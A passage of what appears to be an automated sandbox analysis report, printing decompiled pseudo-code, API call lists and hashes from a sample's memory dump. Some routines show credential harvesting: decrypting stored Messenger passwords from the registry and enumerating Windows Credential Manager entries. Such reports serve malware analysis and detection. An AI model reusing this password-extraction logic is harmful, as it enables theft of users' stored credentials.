                                          					if(_t28 == 0) {
                                          						L4:
                                          						_v8 = GetLastError();
                                          					} else {
                                          						GlobalFix(_t28);
                                          						_t33 = _t20;
                                          						if(ReadFile(_v12, _t33, _t35,  &_v16, 0) == 0) {
                                          							goto L4;
                                          						} else {
                                          							 *((char*)(_t33 + _t35)) = 0;
                                          							GlobalUnWire(_t28);
                                          							SetClipboardData(1, _t28);
                                          						}
                                          					}
                                          					CloseHandle(_v12);
                                          				}
                                          				CloseClipboard();
                                          				return _v8;
                                          			}


                                          APIs
                                          • EmptyClipboard.USER32 ref: 004068BF
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
                                          • GlobalFix.KERNEL32(00000000), ref: 004068FA
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406925
                                          • GetLastError.KERNEL32 ref: 0040692D
                                          • CloseHandle.KERNEL32(?), ref: 00406939
                                          • GetLastError.KERNEL32 ref: 00406944
                                          • CloseClipboard.USER32 ref: 0040694D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                          • String ID:
                                          • API String ID: 2565263379-0
                                          • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                          • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
                                          • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                          • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 19%
                                          			E004088D4(void* __ecx, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                          				char* _v0;
                                          				int _v4;
                                          				int _t38;
                                          				char* _t48;
                                          				void* _t50;
                                          				void* _t57;
                                          				int _t62;
                                          				signed int _t68;
                                          				signed int _t69;
                                          
                                          				_t57 = __ecx;
                                          				_t69 = _t68 & 0xfffffff8;
                                          				0x414060();
                                          				_t38 = GetMenuItemCount(_a8.cbSize);
                                          				_a4 = _t38;
                                          				_v4 = 0;
                                          				if(_t38 <= 0) {
                                          					L15:
                                          					return _t38;
                                          				} else {
                                          					do {
                                          						memset( &_a57, 0, 0x1000);
                                          						_t69 = _t69 + 0xc;
                                          						_a44 =  &_a56;
                                          						_a8.cbSize = 0x30;
                                          						_a12 = 0x36;
                                          						_a48 = 0x1000;
                                          						_a56 = 0;
                                          						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                          							goto L14;
                                          						}
                                          						if(_a56 == 0) {
                                          							L12:
                                          							if(_a28 != 0) {
                                          								_push(0);
                                          								_push(_a28);
                                          								_push(_a4);
                                          								E004088D4(_t57);
                                          								_t69 = _t69 + 0xc;
                                          							}
                                          							goto L14;
                                          						}
                                          						_t62 = _a24;
                                          						_a4160 = 0;
                                          						memset( &_a4161, 0, 0x1000);
                                          						_t48 = strchr( &_a56, 9);
                                          						_t69 = _t69 + 0x14;
                                          						_v0 = _t48;
                                          						if(_a28 != 0) {
                                          							if(_a12 == 0) {
                                          								 *0x41e1fc =  *0x41e1fc + 1;
                                          								_t62 =  *0x41e1fc + 0x11558;
                                          							} else {
                                          								_t62 = _v4 + 0x11171;
                                          							}
                                          						}
                                          						_t50 = E00408BF9(_t62,  &_a4160);
                                          						_pop(_t57);
                                          						if(_t50 != 0) {
                                          							if(_v0 != 0) {
                                          								0x413cf4( &_a4160, _v0);
                                          								_pop(_t57);
                                          							}
                                          							ModifyMenuA(_a8, _v4, 0x400, _t62,  &_a4160);
                                          						}
                                          						goto L12;
                                          						L14:
                                          						_v4 = _v4 + 1;
                                          						_t38 = _v4;
                                          					} while (_t38 < _a4);
                                          					goto L15;
                                          				}
                                          			}

                                          0x004089de
                                          0x004089f4
                                          0x004089f4
                                          0x00000000
                                          0x00408a10
                                          0x00408a10
                                          0x00408a14
                                          0x00408a18
                                          0x00000000
                                          0x00408907

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                          • String ID: 0$6
                                          • API String ID: 3540791495-3849865405
                                          • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                          • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                          • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                          • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E0040C1E0(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                          				void* _v8;
                                          				intOrPtr _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __esi;
                                          				signed int _t44;
                                          				signed int _t45;
                                          				intOrPtr _t47;
                                          				signed int _t52;
                                          				intOrPtr _t81;
                                          				signed char _t85;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				void* _t90;
                                          				void* _t91;
                                          
                                          				_t83 = __ecx;
                                          				_t87 = _a4;
                                          				_t91 = _t87 - 0x402;
                                          				_t90 = __ecx;
                                          				if(_t91 > 0) {
                                          					_t44 = _t87 - 0x415;
                                          					__eflags = _t44;
                                          					if(_t44 == 0) {
                                          						_t45 = E00402942();
                                          						__eflags = _t45;
                                          						if(_t45 != 0) {
                                          							L24:
                                          							if(_t87 ==  *((intOrPtr*)(_t90 + 0x394))) {
                                          								_t79 = _a12;
                                          								_t85 =  *(_a12 + 0xc);
                                          								_t47 =  *((intOrPtr*)(_t90 + 0x390));
                                          								if((_t85 & 0x00000008) == 0) {
                                          									__eflags = _t85 & 0x00000040;
                                          									if((_t85 & 0x00000040) != 0) {
                                          										 *0x41e1f4 =  *0x41e1f4 & 0x00000000;
                                          										__eflags =  *0x41e1f4;
                                          										SetFocus( *(_t47 + 0x184));
                                          									}
                                          								} else {
                                          									E0040AAE2(_t47, _t79);
                                          								}
                                          							}
                                          							return E00402E97(_t90, _t87, _a8, _a12);
                                          						}
                                          						E0040B1EC(__ecx);
                                          						L23:
                                          						E0040AFE6(_t83, _t90, __eflags, 0);
                                          						goto L24;
                                          					}
                                          					_t52 = _t44 - 1;
                                          					__eflags = _t52;
                                          					if(_t52 == 0) {
                                          						E0040B2B5(__ecx);
                                          						goto L23;
                                          					}
                                          					__eflags = _t52 == 6;
                                          					if(_t52 == 6) {
                                          						SetFocus( *(__ecx + 0x174));
                                          					}
                                          					goto L24;
                                          				}
                                          				if(_t91 == 0) {
                                          					 *(__ecx + 0x178) =  *(__ecx + 0x178) & 0x00000000;
                                          					E0040B15B(__ecx);
                                          					goto L23;
                                          				}
                                          				if(_t87 == 0x1c) {
                                          					__eflags = _a8;
                                          					if(_a8 == 0) {
                                          						 *((intOrPtr*)(_t90 + 0x174)) = GetFocus();
                                          					} else {
                                          						E00402F49(__ecx, 0x41c);
                                          					}
                                          					goto L24;
                                          				}
                                          				if(_t87 == 0x20) {
                                          					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                          					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                          						goto L24;
                                          					}
                                          					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
                                          					return 1;
                                          				}
                                          				if(_t87 == 0x2b) {
                                          					_t81 = _a12;
                                          					__eflags =  *((intOrPtr*)(_t81 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                          					if( *((intOrPtr*)(_t81 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                          						SetBkMode( *(_t81 + 0x18), 1);
                                          						SetTextColor( *(_t81 + 0x18), 0xff0000);
                                          						_v8 = SelectObject( *(_t81 + 0x18),  *(__ecx + 0x388));
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_t89 = _a12;
                                          						_v28 = 0x14;
                                          						_v20 = 5;
                                          						DrawTextExA( *(_t89 + 0x18), __ecx + 0x285, 0xffffffff, _t89 + 0x1c, 4,  &_v28);
                                          						SelectObject( *(_t89 + 0x18), _v8);
                                          						_t87 = _a4;
                                          					}
                                          				} else {
                                          					if(_t87 == 0x7b) {
                                          						_t86 = _a8;
                                          						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x390)) + 0x184))) {
                                          							E0040C01D(__ecx, _t86);
                                          						}
                                          					}
                                          				}
                                          				goto L24;
                                          			}

                                          APIs
                                          • SetBkMode.GDI32(?,00000001), ref: 0040C259
                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
                                          • SelectObject.GDI32(?,?), ref: 0040C27C
                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
                                          • SelectObject.GDI32(00000014,?), ref: 0040C2BD
                                            • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
                                            • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
                                            • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
                                          • LoadCursorA.USER32(00000067), ref: 0040C2DE
                                          • SetCursor.USER32(00000000), ref: 0040C2E5
                                          • SetFocus.USER32(?), ref: 0040C33A
                                          • SetFocus.USER32(?), ref: 0040C394
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
                                          • String ID:
                                          • API String ID: 4166086388-0
                                          • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                          • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
                                          • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                          • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E004037A2(char* __edi, long long __fp0) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				int _v40;
                                          				long long _v44;
                                          				long long _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				int _t79;
                                          				char _t80;
                                          				signed int _t95;
                                          				int _t99;
                                          				int _t101;
                                          				void* _t104;
                                          				void* _t105;
                                          				intOrPtr _t114;
                                          				char _t116;
                                          				char* _t117;
                                          				void* _t118;
                                          				long long _t119;
                                          				long long* _t120;
                                          				long long _t154;
                                          				long long _t160;
                                          
                                          				_t154 = __fp0;
                                          				_t117 = __edi;
                                          				_t79 = strlen(__edi);
                                          				asm("fldz");
                                          				_t104 = 0;
                                          				_v52 = __fp0;
                                          				_t118 = 0;
                                          				_pop(_t105);
                                          				_v40 = _t79;
                                          				_v16 = 0;
                                          				_v20 = 0;
                                          				_v24 = 0;
                                          				_v28 = 0;
                                          				_v12 = 0;
                                          				_v32 = 0;
                                          				_v60 = 0x20;
                                          				_v68 = 0;
                                          				_v56 = 0;
                                          				_v64 = 0;
                                          				if(_t79 <= 0) {
                                          					L43:
                                          					_v8 = _t104;
                                          					_t80 = 0x1a;
                                          					if(_v16 != _t104) {
                                          						_v8 = _t80;
                                          					}
                                          					if(_v20 != _t104) {
                                          						_v8 = _v8 + _t80;
                                          					}
                                          					if(_v24 != _t104) {
                                          						_v8 = _v8 + 0xa;
                                          					}
                                          					if(_v28 != _t104) {
                                          						_v8 = _v8 + 0x10;
                                          					}
                                          					if(_v12 != _t104) {
                                          						_v8 = _v8 + 0x11;
                                          					}
                                          					if(_v32 != _t104) {
                                          						_v8 = _v8 + 0x1e;
                                          					}
                                          					if(_v8 <= _t104) {
                                          						if(_v68 != _t104) {
                                          							0x413de6(_v68);
                                          						}
                                          						return 0;
                                          					} else {
                                          						asm("fild dword [ebp-0x4]");
                                          						 *_t120 = _t154;
                                          						0x413d68(_t105, _t105);
                                          						_v44 = _t154;
                                          						 *_t120 =  *0x4196e8;
                                          						0x413d68();
                                          						asm("fdivr qword [ebp-0x28]");
                                          						asm("fistp qword [ebp-0x30]");
                                          						_t119 = _v52;
                                          						if(_v68 != _t104) {
                                          							0x413de6(_v68);
                                          						}
                                          						return _t119;
                                          					}
                                          				} else {
                                          					goto L1;
                                          				}
                                          				do {
                                          					L1:
                                          					_t116 =  *((intOrPtr*)(_t118 + _t117));
                                          					_v8 = _t116;
                                          					if(_t116 - 0x41 <= 0x19) {
                                          						_v16 = _v16 + 1;
                                          					}
                                          					if(_t116 - 0x61 <= 0x19) {
                                          						_v20 = _v20 + 1;
                                          					}
                                          					if(_t116 - 0x30 <= 9) {
                                          						_v24 = _v24 + 1;
                                          					}
                                          					if(_t116 - 0x20 <= 0xf) {
                                          						_v28 = _v28 + 1;
                                          					}
                                          					if(_t116 - 0x3a <= 6) {
                                          						_v12 = _v12 + 1;
                                          					}
                                          					if(_t116 - 0x5b <= 5) {
                                          						_v12 = _v12 + 1;
                                          					}
                                          					if(_t116 < 0x7b) {
                                          						L16:
                                          						if(_t116 <= 0x7e) {
                                          							goto L18;
                                          						}
                                          						goto L17;
                                          					} else {
                                          						if(_t116 > 0x7e) {
                                          							L17:
                                          							_v32 = _v32 + 1;
                                          							L18:
                                          							if(_t118 != _t104) {
                                          								_t95 = 0;
                                          								if(_v56 <= 0) {
                                          									L27:
                                          									_t95 = _t95 | 0xffffffff;
                                          									L28:
                                          									_t104 = 0;
                                          									if(_t95 < 0) {
                                          										E004040C3( &_v68, _v8);
                                          										_t99 = abs( *((char*)(_t118 + _t117)) -  *((char*)(_t118 + _t117 - 1)));
                                          										_pop(_t105);
                                          										if(_t99 != 1) {
                                          											_t47 = _t99 - 2; // -2
                                          											_t105 = _t47;
                                          											if(_t105 > 3) {
                                          												if(_t99 < 6) {
                                          													if(_t99 <= 0xa) {
                                          														goto L42;
                                          													}
                                          													L40:
                                          													_t154 = _v52 +  *0x4196f0;
                                          													L41:
                                          													_v52 = _t154;
                                          													goto L42;
                                          												}
                                          												if(_t99 > 0xa) {
                                          													goto L40;
                                          												}
                                          												_t154 = _v52 +  *0x4196f8;
                                          												goto L41;
                                          											}
                                          											_t154 = _v52 +  *0x419700;
                                          											goto L41;
                                          										}
                                          										_t160 = _v52;
                                          										L30:
                                          										_t154 = _t160 +  *0x419710;
                                          										goto L41;
                                          									}
                                          									_t101 = abs(_t116 -  *((char*)(_t118 + _t117 - 1)));
                                          									_t160 = _v52;
                                          									_pop(_t105);
                                          									if(_t101 != 0) {
                                          										_t154 = _t160 +  *0x419708;
                                          										goto L41;
                                          									}
                                          									goto L30;
                                          								}
                                          								L21:
                                          								if(_t95 < 0 || _t95 >= _v56) {
                                          									_t114 = 0;
                                          								} else {
                                          									_t114 =  *((intOrPtr*)(_t95 + _v68));
                                          								}
                                          								if(_t114 == _t116) {
                                          									goto L28;
                                          								}
                                          								_t95 = _t95 + 1;
                                          								if(_t95 < _v56) {
                                          									goto L21;
                                          								}
                                          								goto L27;
                                          							}
                                          							E004040C3( &_v68, _v8);
                                          							goto L40;
                                          						}
                                          						_v12 = _v12 + 1;
                                          						goto L16;
                                          					}
                                          					L42:
                                          					_t118 = _t118 + 1;
                                          				} while (_t118 < _v40);
                                          				goto L43;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$strlen
                                          • String ID:
                                          • API String ID: 4288758904-3916222277
                                          • Opcode ID: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                          • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
                                          • Opcode Fuzzy Hash: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                          • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,73AFF420,00000000), ref: 0040FE8C
                                          • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 0040FEFE
                                          • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
                                          • RegCloseKey.ADVAPI32(?), ref: 0040FF79
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                          • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                          • API String ID: 2372935584-105384665
                                          • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                          • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
                                          • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                          • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00404D7A(void* __ecx) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				struct HWND__* _t7;
                                          				_Unknown_base(*)()* _t12;
                                          				struct HWND__* _t16;
                                          				void* _t21;
                                          				struct HINSTANCE__* _t24;
                                          
                                          				_v12 = 8;
                                          				_v8 = 0xff;
                                          				_t16 = 0;
                                          				_t21 = 0;
                                          				_t24 = LoadLibraryA("comctl32.dll");
                                          				if(_t24 == 0) {
                                          					L5:
                                          					 *0x415038();
                                          					_t7 = 1;
                                          					L6:
                                          					if(_t7 != 0) {
                                          						return 1;
                                          					} else {
                                          						MessageBoxA(_t7, "Error: Cannot load the common control classes.", "Error", 0x30);
                                          						return 0;
                                          					}
                                          				}
                                          				_t12 = GetProcAddress(_t24, "InitCommonControlsEx");
                                          				if(_t12 != 0) {
                                          					_t21 = 1;
                                          					_t16 =  *_t12( &_v12);
                                          				}
                                          				FreeLibrary(_t24);
                                          				if(_t21 == 0) {
                                          					goto L5;
                                          				} else {
                                          					_t7 = _t16;
                                          					goto L6;
                                          				}
                                          			}

                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                          • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                          • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                          • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 27%
                                          			E00406735(long __edi, intOrPtr _a4) {
                                          				char _v8;
                                          				void* _t8;
                                          				void* _t9;
                                          				long _t12;
                                          				long _t22;
                                          
                                          				_t22 = __edi;
                                          				_t8 = 0;
                                          				_t12 = 0x1100;
                                          				if(__edi - 0x834 <= 0x383) {
                                          					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                          					if(0 != 0) {
                                          						_t12 = 0x1900;
                                          					}
                                          				}
                                          				_t9 = FormatMessageA(_t12, _t8, _t22, 0x400,  &_v8, 0, 0);
                                          				if(_t9 <= 0) {
                                          					0x413d0c(_a4, "Unknown Error");
                                          				} else {
                                          					if(strlen(_v8) < 0x400) {
                                          						0x413d0c(_a4, _v8);
                                          					}
                                          					_t9 = LocalFree(_v8);
                                          				}
                                          				return _t9;
                                          			}

                                          APIs
                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
                                          • strlen.MSVCRT ref: 00406785
                                          • _mbscpy.MSVCRT ref: 00406795
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
                                          • _mbscpy.MSVCRT ref: 004067AF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2881943006-572158859
                                          • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                          • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
                                          • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                          • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404109(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				struct HINSTANCE__* _t10;
                                          				_Unknown_base(*)()* _t14;
                                          				struct HINSTANCE__** _t19;
                                          
                                          				_t19 = __eax;
                                          				E00404170(__eax);
                                          				_t10 = LoadLibraryA("advapi32.dll");
                                          				 *_t19 = _t10;
                                          				if(_t10 != 0) {
                                          					_t19[2] = GetProcAddress(_t10, "CredReadW");
                                          					_t19[3] = GetProcAddress( *_t19, "CredFree");
                                          					_t14 = GetProcAddress( *_t19, "CredEnumerateW");
                                          					_t19[4] = _t14;
                                          					if(_t19[2] == 0 || _t19[3] == 0 || _t14 == 0) {
                                          						E00404170(_t19);
                                          					} else {
                                          						_t19[1] = 1;
                                          					}
                                          				}
                                          				return _t19[1];
                                          			}

                                          APIs
                                            • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,73AFF420), ref: 00404177
                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,73AFF420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                          • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
                                          • API String ID: 2449869053-331516685
                                          • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                          • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
                                          • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                          • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E0040955A(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t96;
                                          				signed int _t98;
                                          				void* _t99;
                                          				signed int _t104;
                                          				signed short _t107;
                                          				signed int _t110;
                                          				intOrPtr _t114;
                                          				signed int _t117;
                                          				signed int _t119;
                                          				signed short _t121;
                                          				signed int _t122;
                                          				signed int _t152;
                                          				signed int _t156;
                                          				signed int _t158;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t168;
                                          				signed int _t169;
                                          				signed int _t170;
                                          				void* _t172;
                                          				void* _t173;
                                          				void* _t174;
                                          				void* _t178;
                                          				intOrPtr _t180;
                                          
                                          				_t174 = __eflags;
                                          				_t172 = __eax;
                                          				E00409370(__eax);
                                          				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                          				_t122 = 5;
                                          				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                          				_t156 = 0x14;
                                          				_t96 = _t122 * _t156;
                                          				 *(_t172 + 0x1b0) = _t122;
                                          				0x413d5c( ~(0 | _t174 > 0x00000000) | _t96);
                                          				 *(_t172 + 0x1b4) = _t96;
                                          				_t158 = 0x10;
                                          				_t98 = _t122 * _t158;
                                          				0x413d5c( ~(0 | _t174 > 0x00000000) | _t98);
                                          				 *(_t172 + 0x34) = _t98;
                                          				_v8 = 0x41b8d8;
                                          				do {
                                          					_t99 = _v8;
                                          					_t168 =  *_t99;
                                          					_v12 = _t168;
                                          					_t169 = _t168 * 0x14;
                                          					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                          					_t104 = _v12 << 4;
                                          					_v12 = _t104;
                                          					memcpy( *(_t172 + 0x34) + _t104, _v8 + 0x14, 0x10);
                                          					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                          					_t173 = _t173 + 0x18;
                                          					_v16 = _t107;
                                          					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                          					if((_t107 & 0xffff0000) == 0) {
                                          						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E0040876F(_t107 & 0x0000ffff);
                                          						_t121 = E0040876F(_v16 | 0x00010000);
                                          						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                          						_t122 = 5;
                                          					}
                                          					_v8 = _v8 + 0x24;
                                          					_t178 = _v8 - 0x41b98c;
                                          				} while (_t178 < 0);
                                          				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                          				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                          				_t161 = 4;
                                          				_t110 = _t122 * _t161;
                                          				 *(_t172 + 0x20) = _t122;
                                          				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                          				0x413d5c( ~(0 | _t178 > 0x00000000) | _t110);
                                          				 *(_t172 + 0x24) = _t110;
                                          				0x413d5c(0xc);
                                          				_t170 = _t110;
                                          				if(_t170 == 0) {
                                          					_t170 = 0;
                                          					__eflags = 0;
                                          				} else {
                                          					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                          					_t180 = _t114;
                                          					_a8 = _t114;
                                          					if(_t180 == 0) {
                                          						_a8 = 0x64;
                                          					}
                                          					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                          					_t163 = 4;
                                          					_t117 = _t122 * _t163;
                                          					 *(_t170 + 4) = _t122;
                                          					0x413d5c( ~(0 | _t180 > 0x00000000) | _t117);
                                          					_a4 = _a4 & 0x00000000;
                                          					 *_t170 = _t117;
                                          					do {
                                          						_t152 = _a4;
                                          						_t119 = _t152 << 2;
                                          						_a4 = _a4 + 1;
                                          						 *( *_t170 + _t119 + 2) = _t152;
                                          						 *((short*)(_t119 +  *_t170)) = _a8;
                                          					} while (_a4 < _t122);
                                          				}
                                          				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
